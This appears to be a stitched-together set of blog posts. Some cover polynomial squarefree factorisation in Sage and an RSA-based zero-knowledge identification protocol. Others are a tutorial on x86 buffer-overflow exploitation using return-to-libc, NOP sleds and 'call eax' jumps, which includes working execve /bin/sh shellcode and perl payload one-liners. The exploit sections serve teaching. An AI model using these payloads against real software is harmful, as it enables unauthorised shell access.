sage: R.<x> = PolynomialRing(ZZ) sage: sqfreefactz( (x+1) * (x+2)^3 * (x+3)^3 * (x+4)^4 * (x+10)^10 ) [(x + 1, 1), (1, 2), (x^2 + 5*x + 6, 3), (x + 4, 4), (1, 5), (1, 6), (1, 7), (1, 8), (1, 9), (x + 10, 10)]

It does not handle non-monic polynomials:

sage: sqfreefactz( 100*(x+1) * (x+2)^3 * (x+3)^3 * (x+4)^4 * (x+10)^10 ) [(x + 1, 1), (1, 2), (x^2 + 5*x + 6, 3), (x + 4, 4), (1, 5), (1, 6), (1, 7), (1, 8), (1, 9), (x + 10, 10)]

but since we eventually want to work over a field, this is not a concern.

Over a finite field (or in general any field of non-zero characteristic), this algorithm does not work, as we can easily see:

sage: R.<x> = PolynomialRing(GF(5)) sage: sqfreefactz( (x+1)^5 ) []

What went wrong? The previous algorithm was based on the fact that if $A = \prod P_i^{e_i}$, then $\gcd(A,A’) = \prod P_i^{e_i-1}$. This is no longer true in non-zero characteristic, for example with $A = (X+1)^5 \in \mathbf{F}_5[X]$ as above, we have $A’ = 0$ and so $\gcd(A,A’) = A$ (and of course in the previous case we had $\gcd(A,A’) \ne A$). So we must determine the correct expression for $\gcd(A,A’)$, which in this case is more complicated.

We start from the squarefree factorisation $A = \prod A_i^i$, where the $A_i$ are all squarefree and relatively prime, and we have

\[ A’ = \sum_i \left(\prod_{j \ne i} A_j^j\right) iA_i’A_i^{i-1}. \]

We want to obtain the factorisation of $T = \gcd(A,A’)$. Let $P$ be an irreducible factor of $T$. Then $P$ is an irreducible factor of $A$, and so it is a factor of $A_m$ for some $m$ (note that $m$ is unique, since the $A_i$ are all relatively prime), and its exponent in the factorisation of $A$ is $m$.

To obtain its exponent in the factorisation of $A’$, we determine its exponent in the factorisation of each summand in the expression above. For all summands $i \ne m$, there is a factor $A_m^m$, so the exponent of $P$ is at least $m$. For the summand $i=m$, $P$ divides none of the $A_j$ (since all the $A_i$ are relatively prime), and it also does not divide $A_m’$ (since $A_m$ is squarefree). Thus the exponent of $P$ in the summand is exactly the exponent of $P$ in $mA_m^{m-1}$, and we obtain finally that the exponent is $m-1$ if $p$ does not divide $m$ (meaning that $m \ne 0$ in $\mathbf{F}_p$), and otherwise the summand is $0$. This means that if $p$ does not divide $m$, then the exponent of $P$ is $m-1$ (the behavior in this case is identical to that in characteristic $0$), and otherwise the exponent of $P$ is at least $m$. In that latter case, since the exponent of $P$ in $A$ is $m$, its exponent in $T$ is $m$ also, and we obtain

\[ T = \prod_{p\nmid i}A_i^{i-1} \prod_{p|i}A_i^i. \]

This means that contrary to the previous case where the exponents of all factors were decreased by $1$, in this case only the factors whose exponent is *not* a multiple of $p$ have their exponents decreased, and the others are unchanged. We can see that when we try to run the previous algorithm, only the factors whose exponent is not a multiple of $p$ are accounted for:

sage: sqfreefactz( (x+2)^4 * (x+1)^5) [(1, 1), (1, 2), (1, 3), (x + 2, 4)] sage: sqfreefactz( (x+2)^4 * (x+1)^5 * (x+3)^7 * (x+4)^15) [(1, 1), (1, 2), (1, 3), (x + 2, 4), (1, 5), (1, 6), (x + 3, 7)]

Since in this case the algorithm is more complicated, we describe it more formally. As above we contruct two sequences of polynomials $(T_k)$ and $(V_k)$. We let $T_1 = T = \gcd(A,A’)$, and $V_1 = A/T = \prod_{p\nmid i} A_i$. The subsequent terms are defined by induction as $V_{k+1} = \gcd(T_k,V_k)$ if $p\nmid k$, $V_{k+1} = V_k$ if $p|k$, and $T_{k+1} = T_k/V_{k+1}$. It is easily checked by induction that

\[ V_k = \prod_{i\ge k,\ p\nmid i} A_i, \]

and that

\[ T_k = \prod_{i>k,\ p\nmid i} A_i^{i-k} \prod_{p|i} A_i^i. \]

As before, we have $A_k = V_{k+1}/V_k$ if $p\nmid k$. How can we obtain the others? If we continue as above until $V_k$ becomes constant, in the end the left factor of $T_k$ becomes constant also, which means that we have $T_k = \prod_{p|i} A_i^i$. Since all the exponents of $T_k$ are multiples of $p$, we have $T_k = W^p$ for some $W$. It is then easy to recover $W$ (divide all exponents by $p$), and we can apply the algorithm recursively to obtain the squarefree factorisation of $W$. We then multiply back the exponents by $p$ to obtain the exponents in $A$, and this finally gives the following algorithm (with an added test to discard unit factors):

def sqfreefact(A, pmult=0): p = A.base_ring().characteristic() x = A.variables()[0] T = gcd(A, A.derivative()) factors = [] k = 1 Tk = T Vk = A//T while Vk.degree() > 0: if k % p != 0: Vkplus1 = gcd(Tk, Vk) if Vk//Vkplus1 != 1: factors.append((Vk//Vkplus1, p^(pmult)*k)) else: Vkplus1 = Vk Tkplus1 = Tk//Vkplus1 k = k+1 Vk = Vkplus1 Tk = Tkplus1 # Now Tk = W^p, so we recover W and continue (unless T is # actually constant). if Tk.degree() == 0: return factors newA = 0*x for i in range(Tk.degree()//p + 1): newA = newA + (Tk.coeffs()[p*i])*x^i return factors + sqfreefact(newA, pmult+1)

which works as expected:

sage: sqfreefact((x+2)^4 * x^4 * (x+1)^5 * (x+3)^7 * (x+4)^15) [(x^2 + 2*x, 4), (x + 3, 7), (x + 1, 5), (x + 4, 15)]]]>

So far, our method of code execution has been to write a shellcode on the stack, and execute it from there. Since there is normally no reason why a program should need to execute anything on the stack, an obvious countermeasure was to make the stack non-executable. Indeed, if you omit the -z execstack compilation flag on the programs of the previous two posts, the attacks will fail with a segmentation fault. So executing code on the stack is no longer possible.

A new method, now referred to as return-to-libc (or ret2libc for short), was introduced by Solar Designer in 1997. As its name implies, instead of overwriting the return address of our vulnerable function with an address on the stack, we will overwrite it with the address of a *libc* function. The libc library contains all the standard functions such as printf() and exit(), so there is almost surely a function in it that does what we need.

Some reminders about the stack. Just after a function has returned, the stack looks like this:

| | +================+ | | old frame of the function | | (no longer part of the stack) | | +================+ the old return address is also no longer | return address | part of the stack +----------------+ | | <- esp (top of the stack) | | | | frame of the caller +----------------+ | old ebp | <- ebp +================+ | |

and on the other hand, just after a function has been called, the stack looks like this:

| | +================+ | return address | <- esp (top of the stack) +----------------+ | argument 1 | +----------------+ | argument 2 | +----------------+ frame of the caller | ... | +----------------+ | argument n | +----------------+ | other data | | | | | <- ebp +================+ | |

If we jump to a function, for example by putting its address as the return address of a vulnerable function, it will not know that it has not been called in the standard way, and will expect the stack to be in the usual form as above. This means that if we modify the return address of a function (say, foo()) with the address of another function (say, bar()), then just after foo() has returned, the two “views” of the stack above will coincide. Thus, we know how to pass parameters to bar(), and even how to set its return address to make it jump to a certain address after it has finished: after the return address of foo() (which is the address of bar()), we write the return address of bar(), and then its arguments.

We will again be exploiting this program :

#include <stdio.h> #include <stdlib.h> #include <string.h> void vuln(char *s) { char buffer[64]; strcpy(buffer, s); } int main(int argc, char **argv) { if (argc == 1) { fprintf(stderr, "Enter a string!\n"); exit(EXIT_FAILURE); } vuln(argv[1]); }

but this time we will not use -z execstack. As before, we need to write 76 bytes to buffer before reaching the return address. We will also disable ASLR, since it makes our lives much harder.

First, we need to obtain the address where the code of system() is located. This address will vary among systems, but (if ASLR is disabled) it will be constant on a given system until libc is recompiled. We can obtain it for example using a bogus program and gdb:

$ cat system.c #include <stdlib.h> int main(void) { system("/bin/sh"); return 0; } $ gcc -m32 -g -o system system.c $ gdb ./system Reading symbols from /home/.../system...done. (gdb) start Temporary breakpoint 1 at 0x80483ed: file system.c, line 5. Starting program: /home/.../system Temporary breakpoint 1, main () at system.c:5 5 system("/bin/sh"); (gdb) print system $1 = {<text variable, no debug info>} 0xf7e5a430 <system>

So the address of system() is 0xf7e5a430, this is what we will write as our return address.

Then, system() takes as argument a string, which is the command we want to run, in our case it is /bin/sh. This is a bigger problem: how do we manage to obtain the address of a string /bin/sh? The easiest way, when ASLR is disabled, is as an environment variable. As we can see, environment variables are stored at the bottom of the stack (higher adresses), and they are also affected by ASLR:

$ cat useraddr.c #include <stdio.h> #include <stdlib.h> int main(int argc, char **argv) { char *p = getenv("USER"); printf("USER is at %p\n", p); return 0; } $ gcc -m32 -o useraddr useraddr.c $ echo 1 | sudo tee /proc/sys/kernel/randomize_va_space 1 $ ./useraddr USER is at 0xffbb3f64 $ ./useraddr USER is at 0xffcb2f64 $ echo 0 | sudo tee /proc/sys/kernel/randomize_va_space 0 $ ./useraddr USER is at 0xffffdf64 $ ./useraddr USER is at 0xffffdf64

We see also that the address of a given environment variable does not change if the program is recompiled:

$ gcc -m32 -o useraddr useraddr.c $ ./useraddr USER is at 0xffffdf64

and that it also does not depend on the length of the program:

$ cat useraddr.c #include <stdio.h> #include <stdlib.h> int plusone(int a) { return a+1; } int add(int a, int b) { int i; int res = a; for (i = 0; i<b; i++) { res = plusone(res); } return res; } int mult(int a, int b) { int i; int res = 0; for (i = 0; i<b; i++) { res = add(res, a); } return res; } int main(int argc, char **argv) { printf("3x2 = %d\n", mult(3, 2)); char *p = getenv("USER"); printf("USER is at %p\n", p); return 0; } $ gcc -m32 -o useraddr useraddr.c $ ./useraddr 3x2 = 6 USER is at 0xffffdf64

It does however depend on the length of the *name* of the program:

$ cp useraddr useraddrrrrrrrrrrrrrrrrrrrrr $ ./useraddrrrrrrrrrrrrrrrrrrrrr 3x2 = 6 USER is at 0xffffdf3c $ cp useraddr 12345678 $ ./12345678 3x2 = 6 USER is at 0xffffdf64

Where does that leave us? We know that, as long as the name of two programs have the same length, a given environment variable will be at the same address in both programs. So, we first define a bogus environment variable to contain our string /bin/sh:

$ export BINSH="/bin/sh"

Next, our vulnerable program will be named vuln8, so we create a bogus program with a five-character name which prints the address of the environment variable BINSH:

$ cat binsh.c #include <stdio.h> #include <stdlib.h> int main(void) { char *p = getenv("BINSH"); printf("BINSH is at %p\n", p); return 0; } $ gcc -m32 -o binsh binsh.c $ ./binsh BINSH is at 0xffffdfe8

We now have everything we need: the address of system() is 0xf7e5a430 and the address of its first argument is 0xffffdfe8. So we do

$ ./vuln8 $(perl -e 'print "1"x76 . "\x30\xa4\xe5\xf7" . "1"x4 . "\xe8\xdf\xff\xff"') sh-4.2$ exit zsh: segmentation fault ./vuln8 $

We get a segmentation fault when we exit our shell (why?), but it works. The next paragraph will explain why we get a segfault and how to suppress it, so don’t read it now if you want to think about it.

Again, we name the caller (vulnerable) function foo(), and the called function (whose address we wrote over the return address of foo()), bar(). As we saw, the word immediately ater the return address of foo() is the return address of bar(). In our case, it will thus be the address where execution will jump when system() terminates (when we exit our shell). Since we put some bogus data in it, the processor will jump to an invalid address, causing a segfault.

It might be desirable to avoid a segfault, perhaps so as to not arouse suspicion from a user, and to do that we need to write a valid address instead. What could we write? If all we wanted is spawn a shell, we have achieved that, so we have nothing more to do, and it seems appropriate to call exit(), to exit the program. We obtain the address of exit() in the same way we obtained the address of system():

$ cat exit.c #include <stdlib.h> int main(void) { exit(0); } $ gcc -m32 -o exit exit.c $ gdb ./exit Reading symbols from /home/.../exit...(no debugging symbols found)...done. (gdb) start Temporary breakpoint 1 at 0x80483d7 Starting program: /home/.../exit Temporary breakpoint 1, 0x080483d7 in main () (gdb) print exit $1 = {<text variable, no debug info>} 0xf7e4dfb0 <exit> (gdb)

so the address of exit() is 0xf7e4dfb0. We don’t really need to care about its arguments since it will exit the program no matter which argument we pass, and we obtain

$./vuln8 $(perl -e 'print "1"x76 . "\x30\xa4\xe5\xf7" . "\xb0\xdf\xe4\xf7" . "\xe8\xdf\xff\xff"') sh-4.2$ exit $]]>

In the following program, the register eax no longer contains the address of buffer at the end of the execution of the function vuln():

#include <stdio.h> #include <stdlib.h> #include <string.h> int vuln(char *s) { char buffer[64]; printf("buffer is at %p\n", buffer); strcpy(buffer, s); return 1; } int main(int argc, char **argv) { if (argc == 1) { fprintf(stderr, "Enter a string!\n"); exit(EXIT_FAILURE); } vuln(argv[1]); }

Indeed, we see that it contains 1:

$ gcc -fno-stack-protector -z execstack -m32 -O0 -std=c99 -pedantic -Wall -Wextra -o vuln7 vuln7.c $ objdump -d vuln7 | nl [...] 121 08048494 <vuln>: 122 8048494: 55 push ebp 123 8048495: 89 e5 mov ebp,esp 124 8048497: 83 ec 58 sub esp,0x58 125 804849a: b8 00 86 04 08 mov eax,0x8048600 126 804849f: 8d 55 b8 lea edx,[ebp-0x48] 127 80484a2: 89 54 24 04 mov DWORD PTR [esp+0x4],edx 128 80484a6: 89 04 24 mov DWORD PTR [esp],eax 129 80484a9: e8 d2 fe ff ff call 8048380 <printf@plt> 130 80484ae: 8b 45 08 mov eax,DWORD PTR [ebp+0x8] 131 80484b1: 89 44 24 04 mov DWORD PTR [esp+0x4],eax 132 80484b5: 8d 45 b8 lea eax,[ebp-0x48] 133 80484b8: 89 04 24 mov DWORD PTR [esp],eax 134 80484bb: e8 e0 fe ff ff call 80483a0 <strcpy@plt> 135 80484c0: b8 01 00 00 00 mov eax,0x1 136 80484c5: c9 leave 137 80484c6: c3 ret [...]

which is the return value of the function (so if you were wondering how return values are passed, you now know that they are passed in eax). So we can’t use the technique of the previous post.

What can we do instead? The obvious answer of writing as return address the address of buffer is not realistic, because we generally have no way to know it exactly. For one thing, modern systems have a protection called ASLR (Address space layout randomisation), which makes it change to a random value on every run of the program, as we can see by running it a couple times:

$ ./vuln7 123 buffer is at 0xffda1ba0 $ ./vuln7 123 buffer is at 0xff8f26e0 $ ./vuln7 123 buffer is at 0xffd79d60 $ ./vuln7 123 buffer is at 0xff924620

But even without this protection (which we can also disable), the address will be different on different systems. This wouldn’t be so much of a problem if we didn’t need to know *exactly* the address to which we need to jump (as it stands, we need to jump exactly on the address of the first instuction of our shellcode, even one byte before or after will not work). In other words, we want to have some “wiggle room”: an area of memory, as large as possible, such that our attack will work if we jump anywhere into it. This is what NOP sleds do.

The idea of a NOP sled is very simple: we populate a large area of memory with bytes 0x90. 0x90 corresponds to the CPU instruction NOP, which does nothing. If we have a large area of NOPs, and our shellcode after it, we can jump anywhere into the area of NOPs, and the CPU will just “slide” to the end, and execute the shellcode which will be waiting there. Visually, it loos like this:

| | +================+ | | <- esp +----------------+ | buffer | <- ebp-72 | (64 bytes) | | | +----------------+ frame of vuln() | | +----------------+ | old ebp | <- ebp +================+ | return address | +----------------+ | NOP | | | ~ ~ | | +----------------+ | shellcode | | | +----------------+ | |

This is somewhat dirty, since we need to overwrite a large area of memory, and also unreliable because, since we will choose our return address more or less randomly, it might not always be inside the NOP sled (of course, the larger the sled, the higher the probability of success). But eventually, it will work (we use as return address an adress of buffer from a previous run; it is very unlikely that we will get the same address again, but it is good enough):

$ for i in $(seq 1 10000); do echo $i; ./vuln7 $(perl -e 'print "1"x76 . "\xa0\x1b\xde\xff" . "\x90"x100000 . "\xeb\x18\x5e\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\xb0\x0b\x8d\x1e\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"'); done [...] 52 buffer is at 0xffd8a4b0 sh-4.2$]]>

The scenario is as follows: we first have a trusted authority, whom we will name Trent. Trent is trusted by everyone: what he says is true. Trent distributes to all interested parties a secret based on their identity, that he only can compute. Then, when Alice wants to identify to Bob, she uses a zero-knowledge protocol to demonstrate that she knows the secret associated to her identity, but without revealing it (so that Bob cannot subsequently impersonate her).

First, Trent chooses a RSA integer $n$ (product of two large, distinct primes $p,q$), and a public RSA exponent $e$ (an integer relatively prime with $\varphi(n) = (p-1)(q-1)$, we can assume that $e$ is a small prime, for example $e=3$ is perfectly fine). He then computes the associated private exponent $d$, and as usual publishes $n$ and $e$, keeping $p,q,d$ secret. We suppose that Alice’s identity (for example her name or her e-mail address) is somehow encoded as an element $I \in \mathbf{Z}_n^*$, then Trent gives her the value $B = I^{-d}$, which is Alice’s secret.

In order to identify to Bob, Alice wants to prove to him that she knows $B$, but wthout revealing it. They proceed as follows:

- Alice chooses at random an element $r \in \mathbf{Z}_n^*$, and computes $T = r^e$. She sends $T$ to Bob and keeps $r$ secret (this is RSA encryption).
- Bob chooses at random an element $c \in \{0,\dots,e-1\}$ (called the
*challenge*) and sends it to Alice. - Alice computes $t = rB^c$ and sends it to Bob.
- Bob accepts the identification if and only if $I^ct^e = T$.

This protocol has the three usual properties:

**Completeness:** If Alice really is Alice, then she can always make Bob accept her identification: she just needs to compute $t = rB^c$ as indicated by the protocol. Then

\[ \begin{align*}

I^ct^e

&= I^c(rB^c)^e \\

&= I^cr^eB^{ce} \\

&= I^cr^eI^{-dce} \\

&= I^cr^e(I^{de})^{-c} \\

&= I^cr^eI^{-c} \\

&= r^e \\

&= T,

\end{align*} \]

so Bob will accept.

**Soundness:** If Alice can have her identification accepted by Bob no matter which challenge he sends her, then she must be Alice. Supose that, for a fixed value of $r$, Alice can give the accepted answers $t_1,t_2$ respectively to the challenges $c_1,c_2$. Then we have

\[ I^{c_1}t_1^e = T = I^{c_2}t_2^e, \]

and it follows that

\[ I^{c_1-c_2} = (t_2t_1^{-1})^e. \]

Since we assumed that $e$ is prime and we have $|c_1-c_2| < e$, $c_1-c_2$ and $e$ are relatively prime, and we can obtain a Bézout identity:
\[ a(c_1-c_2)+be = 1. \]
If we now let
\[ z = I^b(t_2t_1^{-1})^a, \]
we obtain
\[ \begin{align*}
z^e
&= I^{be}(t_2t_1^{-1})^{ae} \\
&= I^{be}I^{a(c_1-c_2)} \\
&= I^{be+a(c_1-c_2)} \\
&= I.
\end{align*} \]
This means that if Alice can successfully answer both challenges, then she must know an $e$th root $z$ of $I$ in $\mathbf{Z}_n^*$. The RSA assumption states that this is not possible in any reasonable time with non-negligible probability without knowing the prime factors of $n$. Since Alice does not know them, she must have obtained an $e$th root of $I$ from someone who does, and the only person who does is Trent. So the $e$th root of $I$ is just (the inverse of) her secret $B$, and since of course Trent will only give Alice the secret $B$ corresponding to an identity $I$ if $I$ really is Alice's identity, we see that Alice must be who she claims to be.
**Zero-knowledge:** What information does Bob obtain from the protocol? He first obtains $T = r^e$ for a $r$ randomly chosen by Alice. Since $e$ is public, Bob could just as well have generated a random $r$ himself, so he does not obtain anything new. Then he obtains $t = rB^c$, and since $r$ is random, $t$ must be random also since Bob cannot recover $r$ from $T$ (by the RSA assumption). So Bob does not learn anything about $B$.

We saw in the previous post what a shellcode was, and studied one in detail. We also discussed the basic idea of what we want to do with it: write it in memory, and have the processor execute it. The first part is easy: since a shellcode is just a string of bytes, we can pass it to a vulnerable program like we would any other string. The second part is where the challenge is. In this post, we will see one way to do it, which is very simple but works only under very favourable conditions.

The program we will exploit is as follows:

#include <stdio.h> #include <stdlib.h> #include <string.h> void vuln(char *s) { char buffer[64]; strcpy(buffer, s); } int main(int argc, char **argv) { if (argc == 1) { fprintf(stderr, "Enter a string!\n"); exit(EXIT_FAILURE); } vuln(argv[1]); }

As you might have guessed, we will first write our shellcode in buffer, then some random data until we reach the return address, and then overwrite the return address with something that will make the processor run our shellcode. And again the challenge is what exactly to write as a return address.

After disassembling the program, we make two key observations. First, from the code of vuln():

$ gcc -m32 -std=c99 -O0 -fno-stack-protector -z execstack -pedantic -Wall -Wextra -o vuln4 vuln4.c $ objdump -d vuln4 | nl [...] 117 08048464 <vuln>: 118 8048464: 55 push ebp 119 8048465: 89 e5 mov ebp,esp 120 8048467: 83 ec 58 sub esp,0x58 121 804846a: 8b 45 08 mov eax,DWORD PTR [ebp+0x8] 122 804846d: 89 44 24 04 mov DWORD PTR [esp+0x4],eax 123 8048471: 8d 45 b8 lea eax,[ebp-0x48] 124 8048474: 89 04 24 mov DWORD PTR [esp],eax 125 8048477: e8 f4 fe ff ff call 8048370 <strcpy@plt> 126 804847c: c9 leave 127 804847d: c3 ret [...]

we see that at the end of the execution of the function, the register eax will contain the address of buffer. This gives us an idea: if, somewhere in the program, there was an instruction call eax or jmp eax, then we could write the address of that instruction as our return address. The processor would then jump to it, which would cause it to jump right on our shellcode. And sure enough:

$ objdump -d vuln4 | grep "call.*eax" 8048418: ff 14 85 1c 9f 04 08 call DWORD PTR [eax*4+0x8049f1c] 804845f: ff d0 call eax 804857b: ff d0 call eax

so we will write 0x0804845f as our return address. The rest is routine, and we obtain

$ ./vuln4 $(perl -e 'print "\xeb\x18\x5e\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\xb0\x0b\x8d\x1e\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" . "1"x38 . "\x5f\x84\x04\x08"') sh-4.2$]]>